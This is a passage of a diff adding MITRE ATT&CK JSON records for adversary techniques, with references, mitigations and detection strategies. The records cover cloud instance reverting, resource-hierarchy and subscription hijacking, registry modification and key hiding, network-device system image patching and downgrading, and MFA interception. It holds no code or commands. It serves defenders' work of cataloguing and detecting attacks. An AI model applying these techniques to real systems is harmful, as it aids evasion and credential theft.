+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-16 20:07:53.098000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0492: Detection Strategy for Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-16 18:42:20.734000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Revert Cloud Instance",
+                    "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1578/004",
+                            "external_id": "T1578.004"
+                        },
+                        {
+                            "source_name": "Google - Restore Cloud Snapshot",
+                            "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.",
+                            "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots"
+                        },
+                        {
+                            "source_name": "Tech Republic - Restore AWS Snapshots",
+                            "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.",
+                            "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Netskope"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-16 20:07:52.953000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0337: Detection Strategy for Modify Cloud Compute Infrastructure: Revert Cloud Instance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-09-25 14:16:19.234000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Modify Cloud Resource Hierarchy",
+                    "description": "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  \n\nIaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim\u2019s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS re Inforce Trust Mod)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1666",
+                            "external_id": "T1666"
+                        },
+                        {
+                            "source_name": "AWS re Inforce Trust Mod",
+                            "description": "AWS re Inforce. (2024, June). Retrieved April 15, 2026.",
+                            "url": "https://d1.awsstatic.com/onedam/marketing-channels/website/aws/en_US/events/approved/reinforce-2025/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf"
+                        },
+                        {
+                            "source_name": "AWS Organizations",
+                            "description": "AWS. (n.d.). Terminology and concepts for AWS Organizations. Retrieved September 25, 2024.",
+                            "url": "https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html"
+                        },
+                        {
+                            "source_name": "Microsoft Subscription Hijacking 2022",
+                            "description": "Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.",
+                            "url": "https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121"
+                        },
+                        {
+                            "source_name": "Microsoft Azure Resources",
+                            "description": "Microsoft Azure. (2024, May 31). Organize your Azure resources effectively. Retrieved September 25, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources"
+                        },
+                        {
+                            "source_name": "Microsoft Peach Sandstorm 2023",
+                            "description": "Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-16 20:07:52.999000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0155: Detection Strategy for Modify Cloud Resource Hierarchy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:23.587000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Modify Registry",
+                    "description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\n\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\n\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to impair defenses, such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\n\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1112",
+                            "external_id": "T1112"
+                        },
+                        {
+                            "source_name": "CISA Russian Gov Critical Infra 2018",
+                            "description": "CISA. (2018, March 16). Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025.",
+                            "url": "https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors"
+                        },
+                        {
+                            "source_name": "CISA LockBit 2023",
+                            "description": "CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved March 24, 2025.",
+                            "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a"
+                        },
+                        {
+                            "source_name": "Avaddon Ransomware 2021",
+                            "description": "Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved March 24, 2025.",
+                            "url": "https://arxiv.org/pdf/2102.04796"
+                        },
+                        {
+                            "source_name": "Microsoft BlackCat Jun 2022",
+                            "description": "Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/"
+                        },
+                        {
+                            "source_name": "Microsoft Reg",
+                            "description": "Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.",
+                            "url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft Remote",
+                            "description": "Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.",
+                            "url": "https://technet.microsoft.com/en-us/library/cc754820.aspx"
+                        },
+                        {
+                            "source_name": "SpectorOps Hiding Reg Jul 2017",
+                            "description": "Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.",
+                            "url": "https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353"
+                        },
+                        {
+                            "source_name": "Microsoft Reghide NOV 2006",
+                            "description": "Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.",
+                            "url": "https://docs.microsoft.com/sysinternals/downloads/reghide"
+                        },
+                        {
+                            "source_name": "TrendMicro POWELIKS AUG 2014",
+                            "description": "Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/"
+                        },
+                        {
+                            "source_name": "Unit42 BabyShark Feb 2019",
+                            "description": "Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Bartosz Jerzman",
+                        "David Lu, Tripwire",
+                        "Gerardo Santos",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-16 20:07:53.021000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1024: Restrict Registry Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0280: Behavior-Based Registry Modification Detection on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 19:42:19.740000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Modify System Image",
+                    "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1601",
+                            "external_id": "T1601"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2026-04-16 20:07:53.013000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1043: Credential Access Protection",
+                            "M1045: Code Signing",
+                            "M1046: Boot Integrity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0170: Detection Strategy for Modify System Image on Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 19:53:10.576000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Downgrade System Image",
+                    "description": "Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1601/002",
+                            "external_id": "T1601.002"
+                        },
+                        {
+                            "source_name": "Cisco Synful Knock Evolution",
+                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
+                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-16 20:07:53.109000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1043: Credential Access Protection",
+                            "M1045: Code Signing",
+                            "M1046: Boot Integrity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0569: Detection Strategy for Downgrade System Image on Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 19:49:24.129000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Patch System Image",
+                    "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary\u2019s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1601/001",
+                            "external_id": "T1601.001"
+                        },
+                        {
+                            "source_name": "Killing IOS diversity myth",
+                            "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.",
+                            "url": "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf"
+                        },
+                        {
+                            "source_name": "Cisco IOS Forensics Developments",
+                            "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.",
+                            "url": "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf"
+                        },
+                        {
+                            "source_name": "Cisco IOS Shellcode",
+                            "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.",
+                            "url": "http://2015.zeronights.org/assets/files/05-Nosenko.pdf"
+                        },
+                        {
+                            "source_name": "Juniper Netscreen of the Dead",
+                            "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.",
+                            "url": "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf"
+                        },
+                        {
+                            "source_name": "Killing the myth of Cisco IOS rootkits",
+                            "description": "Sebastian 'topo' Mu\u00f1iz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.",
+                            "url": "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-16 20:07:53.106000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1043: Credential Access Protection",
+                            "M1045: Code Signing",
+                            "M1046: Boot Integrity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0469: Detection Strategy for Patch System Image on Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:23.195000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Multi-Factor Authentication Interception",
+                    "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users\u2019 phones.(Citation: Okta Scatter Swine 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1111",
+                            "external_id": "T1111"
+                        },
+                        {
+                            "source_name": "GCN RSA June 2011",
+                            "description": "Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved November 17, 2024.",
+                            "url": "https://www.route-fifty.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/"
+                        },
+                        {
+                            "source_name": "Mandiant M Trends 2011",
+                            "description": "Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016.",
+                            "url": "https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf"
+                        },
+                        {
+                            "source_name": "Okta Scatter Swine 2022",
+                            "description": "Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.",
+                            "url": "https://sec.okta.com/scatterswine"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "John Lambert, Microsoft Threat Intelligence Center"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
